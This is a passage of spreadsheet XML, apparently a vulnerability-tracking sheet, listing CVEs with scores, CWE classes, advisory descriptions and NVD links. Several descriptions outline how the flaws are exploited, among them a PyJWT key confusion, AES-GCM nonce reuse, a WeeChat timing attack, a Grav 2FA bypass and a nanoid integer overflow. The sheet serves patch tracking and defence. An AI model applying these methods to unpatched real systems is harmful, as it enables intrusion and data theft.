          <t>PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, when the verifier is decoding JSON Web Tokens, while supporting both asymmetric and HMAC algorithms, the library does not validate use of JSON Web Keys in HMAC algorithm, allowing attacker to use the issuer public key as the secret key for HMAC algorithm. This vulnerability is fixed in 2.13.0.</t>
        </is>
      </c>
      <c r="M2903" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48526</t>
        </is>
      </c>
    </row>
    <row r="2904">
      <c r="A2904" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2904" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50577</t>
        </is>
      </c>
      <c r="C2904" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2904" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2904" s="5" t="inlineStr"/>
      <c r="F2904" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2904" s="5" t="inlineStr"/>
      <c r="H2904" s="5" t="inlineStr"/>
      <c r="I2904" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2904" s="5" t="inlineStr"/>
      <c r="K2904" s="5" t="inlineStr">
        <is>
          <t>CWE-323</t>
        </is>
      </c>
      <c r="L2904" s="5" t="inlineStr">
        <is>
          <t>ePA 3.x Integration implements the authorization workflow and writes Medical Information Objects to Germany's electronic patient record. Prior to 1.3.0, ePA 3.x Integration leaves request_counter unchanged in app/vau/VAUProtokoll.py while constructing VAU messages. The frozen client request counter causes the server side to reuse AES-GCM nonce and key combinations across responses. A network attacker who collects repeated ciphertexts can recover the XOR of plaintexts and use predictable inner HTTP headers and JSON fields to recover sensitive data, including patient health records. Repeated nonces can also enable recovery of the GHASH authentication key through the Joux forbidden attack, allowing forged AES-GCM messages and injection of malicious responses. The response-counter check also fails to maintain last_response_counter, weakening replay and ordering validation. This issue is fixed in version 1.3.0.</t>
        </is>
      </c>
      <c r="M2904" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50577</t>
        </is>
      </c>
    </row>
    <row r="2905">
      <c r="A2905" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2905" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53525</t>
        </is>
      </c>
      <c r="C2905" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2905" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2905" s="5" t="inlineStr"/>
      <c r="F2905" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2905" s="5" t="inlineStr"/>
      <c r="H2905" s="5" t="inlineStr"/>
      <c r="I2905" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2905" s="5" t="inlineStr"/>
      <c r="K2905" s="5" t="inlineStr">
        <is>
          <t>CWE-208</t>
        </is>
      </c>
      <c r="L2905" s="5" t="inlineStr">
        <is>
          <t>WeeChat (Wee Enhanced Environment for Chat) is a free chat client. In versions 0.3.1 through 4.9.0, the WeeChat relay authentication uses non-constant-time string comparison functions (weechat_strcasecmp and strcmp) to verify password hashes and plaintext passwords. An attacker can exploit timing differences to extract the server-computed hash character by character, then authenticate using the correct hash without knowing the password. Version 4.9.1 fixes the issue.</t>
        </is>
      </c>
      <c r="M2905" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53525</t>
        </is>
      </c>
    </row>
    <row r="2906">
      <c r="A2906" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2906" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54550</t>
        </is>
      </c>
      <c r="C2906" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2906" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2906" s="5" t="inlineStr"/>
      <c r="F2906" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2906" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2906" s="5" t="inlineStr"/>
      <c r="I2906" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2906" s="5" t="inlineStr"/>
      <c r="K2906" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2906" s="5" t="inlineStr">
        <is>
          <t>IzPack is a widely used tool for packaging applications on the Java platform as cross-platform installers. In 5.2.6 and earlier, UnpackerBase.unpack() in izpack-installer/src/main/java/com/izforge/izpack/installer/unpacker/UnpackerBase.java obtains an attacker-controlled PackFile targetPath, passes it through IoHelper.translatePath(), which only converts separators, and constructs a File without normalizing parent-directory segments or enforcing destination containment. A malicious installer pack entry containing ../ sequences can therefore write outside the intended installation directory to startup folders, executable search paths, or other locations accessible with the victim's privileges when the victim runs the installer.</t>
        </is>
      </c>
      <c r="M2906" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54550</t>
        </is>
      </c>
    </row>
    <row r="2907">
      <c r="A2907" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2907" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56135</t>
        </is>
      </c>
      <c r="C2907" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2907" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2907" s="5" t="inlineStr"/>
      <c r="F2907" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2907" s="5" t="inlineStr"/>
      <c r="H2907" s="5" t="inlineStr"/>
      <c r="I2907" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J2907" s="5" t="inlineStr"/>
      <c r="K2907" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2907" s="5" t="inlineStr">
        <is>
          <t>In NTFS-3G through 2026.2.25, a heap-based buffer overflow exists in the function build_inherited_id() in libntfs-3g/security.c that allows an attacker to corrupt heap memory in the SUID-root ntfs-3g binary by crafting a malicious NTFS image. The overflow is triggered by creating a file in a crafted directory.</t>
        </is>
      </c>
      <c r="M2907" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56135</t>
        </is>
      </c>
    </row>
    <row r="2908">
      <c r="A2908" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2908" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5795</t>
        </is>
      </c>
      <c r="C2908" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2908" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2908" s="5" t="inlineStr"/>
      <c r="F2908" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2908" s="5" t="inlineStr"/>
      <c r="H2908" s="5" t="inlineStr">
        <is>
          <t>eclipse:jetty</t>
        </is>
      </c>
      <c r="I2908" s="5" t="inlineStr">
        <is>
          <t>2026-04-08</t>
        </is>
      </c>
      <c r="J2908" s="5" t="inlineStr"/>
      <c r="K2908" s="5" t="inlineStr">
        <is>
          <t>CWE-226, CWE-287</t>
        </is>
      </c>
      <c r="L2908" s="5" t="inlineStr">
        <is>
          <t>In Eclipse Jetty, the class JASPIAuthenticator initiates the authentication checks, which set two ThreadLocal variable.
Upon returning from the initial checks, there are conditions that cause an early return from the JASPIAuthenticator code without clearing those ThreadLocals.
A subsequent request using the same thread inherits the ThreadLocal values, leading to a broken access control and privilege escalation.</t>
        </is>
      </c>
      <c r="M2908" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5795</t>
        </is>
      </c>
    </row>
    <row r="2909">
      <c r="A2909" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2909" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62669</t>
        </is>
      </c>
      <c r="C2909" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2909" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2909" s="5" t="inlineStr"/>
      <c r="F2909" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2909" s="5" t="inlineStr"/>
      <c r="H2909" s="5" t="inlineStr"/>
      <c r="I2909" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2909" s="5" t="inlineStr"/>
      <c r="K2909" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L2909" s="5" t="inlineStr">
        <is>
          <t>Grav Login Plugin adds login, basic ACL, and session wide messages to Grav. Prior to 3.8.11, the Grav Login plugin login.regenerate2FASecret task checks only that the pending-session user exists rather than requiring $user-&gt;authorized. After submitting a victim's correct password, an attacker can invoke taskRegenerate2FASecret() during the pending TOTP challenge, overwrite twofa_secret, read the replacement secret from the response, calculate a valid code, and complete authentication without the victim's second factor. This issue is fixed in version 3.8.11.</t>
        </is>
      </c>
      <c r="M2909" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62669</t>
        </is>
      </c>
    </row>
    <row r="2910">
      <c r="A2910" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2910" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62906</t>
        </is>
      </c>
      <c r="C2910" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2910" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2910" s="5" t="inlineStr"/>
      <c r="F2910" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2910" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2910" s="5" t="inlineStr"/>
      <c r="I2910" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2910" s="5" t="inlineStr"/>
      <c r="K2910" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L2910" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in Microsoft Discovery Studio allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2910" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62906</t>
        </is>
      </c>
    </row>
    <row r="2911">
      <c r="A2911" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2911" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69347</t>
        </is>
      </c>
      <c r="C2911" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2911" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2911" s="5" t="inlineStr"/>
      <c r="F2911" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2911" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2911" s="5" t="inlineStr"/>
      <c r="I2911" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2911" s="5" t="inlineStr"/>
      <c r="K2911" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2911" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M2911" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69347</t>
        </is>
      </c>
    </row>
    <row r="2912">
      <c r="A2912" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2912" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70604</t>
        </is>
      </c>
      <c r="C2912" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2912" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2912" s="5" t="inlineStr"/>
      <c r="F2912" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2912" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2912" s="5" t="inlineStr"/>
      <c r="I2912" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2912" s="5" t="inlineStr"/>
      <c r="K2912" s="5" t="inlineStr">
        <is>
          <t>CWE-942</t>
        </is>
      </c>
      <c r="L2912" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.10, 40.9.3, 41.4.0, and 42.0.0, a custom scheme registered with supportFetchAPI: true but without corsEnabled: true was not subject to CORS enforcement. A page loaded from a remote origin could therefore fetch() or XMLHttpRequest that scheme cross-origin and read the full response body, rather than the read being blocked. Apps that serve sensitive data from such a scheme and load remote or untrusted content in a renderer are affected. This issue is fixed in versions 39.8.10, 40.9.3, 41.4.0, and 42.0.0.</t>
        </is>
      </c>
      <c r="M2912" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70604</t>
        </is>
      </c>
    </row>
    <row r="2913">
      <c r="A2913" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2913" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70666</t>
        </is>
      </c>
      <c r="C2913" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2913" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2913" s="5" t="inlineStr"/>
      <c r="F2913" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2913" s="5" t="inlineStr"/>
      <c r="H2913" s="5" t="inlineStr"/>
      <c r="I2913" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2913" s="5" t="inlineStr"/>
      <c r="K2913" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2913" s="5" t="inlineStr">
        <is>
          <t>Lemur manages TLS certificate creation. Prior to 1.9.3, an authority-role member could update acme_url through PUT /api/1/authorities/ without revalidation and direct setup_acme_client_no_retry to an attacker-controlled ACME server. ACME directory and order responses contain newNonce, newOrder, authorizations, and finalize URLs chosen by that server. The Lemur ClientV2 followed those URLs without requiring their host to match the configured directory host, allowing JWS-signed requests to internal services or cloud metadata endpoints. The issue required an ACME authority and a user authorized for that authority, but did not require global administrator privileges. The fix revalidates updates and introduces _PinnedClientNetwork to enforce a single allowed host for the complete ACME flow. This issue is fixed in version 1.9.3.</t>
        </is>
      </c>
      <c r="M2913" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70666</t>
        </is>
      </c>
    </row>
    <row r="2914">
      <c r="A2914" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2914" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71375</t>
        </is>
      </c>
      <c r="C2914" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2914" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2914" s="5" t="inlineStr"/>
      <c r="F2914" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2914" s="5" t="inlineStr"/>
      <c r="H2914" s="5" t="inlineStr"/>
      <c r="I2914" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2914" s="5" t="inlineStr"/>
      <c r="K2914" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="L2914" s="5" t="inlineStr">
        <is>
          <t>Improper restriction of XML external entity reference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M2914" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71375</t>
        </is>
      </c>
    </row>
    <row r="2915">
      <c r="A2915" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2915" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71622</t>
        </is>
      </c>
      <c r="C2915" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2915" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2915" s="5" t="inlineStr"/>
      <c r="F2915" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2915" s="5" t="inlineStr"/>
      <c r="H2915" s="5" t="inlineStr"/>
      <c r="I2915" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2915" s="5" t="inlineStr"/>
      <c r="K2915" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L2915" s="5" t="inlineStr">
        <is>
          <t>SQL injection vulnerability in Zhao-github APiAdmin v.5.0.1 allows a remote attacker to obtain sensitive information via the User.php component</t>
        </is>
      </c>
      <c r="M2915" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71622</t>
        </is>
      </c>
    </row>
    <row r="2916">
      <c r="A2916" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2916" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73086</t>
        </is>
      </c>
      <c r="C2916" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2916" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2916" s="5" t="inlineStr"/>
      <c r="F2916" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2916" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2916" s="5" t="inlineStr"/>
      <c r="I2916" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2916" s="5" t="inlineStr"/>
      <c r="K2916" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2916" s="5" t="inlineStr">
        <is>
          <t>nanoid is a secure, URL-friendly, unique string ID generator for JavaScript. Prior to versions 3.3.12 and 5.1.11, the nanoid(size) function in index.js and index.cjs coerces the user-influenced size parameter to a signed 32-bit integer, allowing a value of 2147483648 to become -2147483648 and corrupt the process-wide CSPRNG poolOffset in fillPool(), which causes subsequent session tokens, CSRF tokens, API keys, and unique identifiers to become the deterministic string "uuuuuuuuuuuuuuuuuuuuu" until the process restarts. This issue is fixed in versions 3.3.12 and 5.1.11.</t>
        </is>
      </c>
      <c r="M2916" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73086</t>
        </is>
      </c>
    </row>
    <row r="2917">
      <c r="A2917" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2917" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73495</t>
        </is>
      </c>
      <c r="C2917" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2917" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2917" s="5" t="inlineStr"/>
      <c r="F2917" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2917" s="5" t="inlineStr"/>
      <c r="H2917" s="5" t="inlineStr"/>
      <c r="I2917" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2917" s="5" t="inlineStr"/>
      <c r="K2917" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L2917" s="5" t="inlineStr">
        <is>
          <t>blaze is a Scala library for building asynchronous pipelines, with a focus on network IO. Prior to 0.23.18 and 1.0.0-M42, blaze-server can merge HTTP/1.1 chunked-body trailer fields into Request.headers. Because trailer fields are attacker-controlled, an unauthenticated remote client can inject arbitrary header names and values, including X-Forwarded-For and internal authorization headers, that a fronting proxy sanitized from the request-header section, bypassing header-based trust decisions in the application. Any http4s application using BlazeServerBuilder over HTTP/1.1 whose routes or middleware trust proxy-set headers, including X-Forwarded-For, X-Real-IP, and X-Forwarded-Host, is affected. If a fronting proxy strips or normalizes those headers but forwards chunked bodies with trailers intact, an attacker can spoof client IP for allow-lists, rate limits, or auditing, forge the https scheme, or inject internal authorization headers. A promoted Connection: close trailer is also honored, allowing attacker-controlled termination of pooled backend connections. This issue is fixed in versions 0.23.18 and 1.0.0-M42.</t>
        </is>
      </c>
      <c r="M2917" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73495</t>
        </is>
      </c>
    </row>
    <row r="2918">
      <c r="A2918" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2918" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76196</t>
        </is>
      </c>
      <c r="C2918" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2918" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2918" s="5" t="inlineStr"/>
      <c r="F2918" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2918" s="5" t="inlineStr"/>
      <c r="H2918" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop_mobile</t>
        </is>
      </c>
      <c r="I2918" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2918" s="5" t="inlineStr"/>
      <c r="K2918" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="L2918" s="5" t="inlineStr">
        <is>
          <t>Photoshop Mobile is affected by a Session Fixation vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to gain access to sensitive resources. Exploit depends on conditions beyond the attacker's control. Exploitation of this issue requires user interaction in that a victim must interact with a malicious webpage. Scope is changed.</t>
        </is>
      </c>
      <c r="M2918" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76196</t>
        </is>
      </c>
    </row>
    <row r="2919">
      <c r="A2919" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2919" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78254</t>
        </is>
      </c>
      <c r="C2919" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2919" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2919" s="5" t="inlineStr"/>
      <c r="F2919" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2919" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2919" s="5" t="inlineStr">
        <is>
          <t>apache:ant</t>
        </is>
      </c>
      <c r="I2919" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2919" s="5" t="inlineStr"/>
      <c r="K2919" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L2919" s="5" t="inlineStr">
        <is>
          <t>The ftp and scp tasks of Apache Ant can download files from a remote server. A malicious server can provide relative paths that allow it to write outside of the dedicated target directory for the download, making it possible to overwrite files of the attacker's choice using the permissions of the user running Ant in versions prior to Ant 1.10.18. 
In order to exploit this vulnerability, the server would either have to be malicious or be subject to a machine-in-the-middle attack. Additionally in the case of scp or the ftp task using ftps the server must pass the server identity checks performed by the tasks.
For ftp tasks not using ftps a malicious server could act as a machine-in-the-middle to provide malicious files.
Starting with Ant 1.10.18 both tasks will prevent writing outside of the destination directory by default. An option is available to disable this behavior in the unlikely case that the  old behavior is required by existing build files.
Mitigations:
Users of scp and ftp (when using ftps) in any version of Ant should not bypass server identity checks. Users of ftp not using ftps should switch to ftps where possible.
All users are recommended to upgrade to Apache Ant 1.10.18, which fixes this issue.</t>
        </is>
      </c>
      <c r="M2919" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78254</t>
        </is>
      </c>
    </row>
    <row r="2920">
      <c r="A2920" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2920" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78461</t>
        </is>
      </c>
      <c r="C2920" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2920" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2920" s="5" t="inlineStr"/>
      <c r="F2920" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G2920" s="5" t="inlineStr"/>
      <c r="H2920" s="5" t="inlineStr"/>
      <c r="I2920" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2920" s="5" t="inlineStr"/>
      <c r="K2920" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2920" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="M2920" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78461</t>
        </is>
      </c>
    </row>
    <row r="2921">
      <c r="A2921" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2921" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78492</t>
        </is>
      </c>
      <c r="C2921" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2921" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2921" s="5" t="inlineStr"/>
      <c r="F2921" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2921" s="5" t="inlineStr"/>
      <c r="H2921" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2921" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2921" s="5" t="inlineStr"/>
      <c r="K2921" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L292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2921" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78492</t>
        </is>
      </c>
    </row>
    <row r="2922">
      <c r="A2922" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2922" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78494</t>
        </is>
      </c>
      <c r="C2922" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2922" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2922" s="5" t="inlineStr"/>
      <c r="F2922" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2922" s="5" t="inlineStr"/>
      <c r="H2922" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2922" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2922" s="5" t="inlineStr"/>
      <c r="K2922" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L292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2922" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78494</t>
        </is>
      </c>
    </row>
    <row r="2923">
      <c r="A2923" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2923" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79644</t>
        </is>
      </c>
      <c r="C2923" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2923" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2923" s="5" t="inlineStr"/>
      <c r="F2923" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2923" s="5" t="inlineStr"/>
      <c r="H2923" s="5" t="inlineStr"/>
      <c r="I2923" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2923" s="5" t="inlineStr"/>
      <c r="K2923" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L292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2923" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79644</t>
        </is>
      </c>
    </row>
    <row r="2924">
      <c r="A2924" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2924" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79963</t>
        </is>
      </c>
      <c r="C2924" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2924" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2924" s="5" t="inlineStr"/>
      <c r="F2924" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2924" s="5" t="inlineStr"/>
      <c r="H2924" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2924" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2924" s="5" t="inlineStr"/>
      <c r="K2924" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="L2924" s="5" t="inlineStr">
        <is>
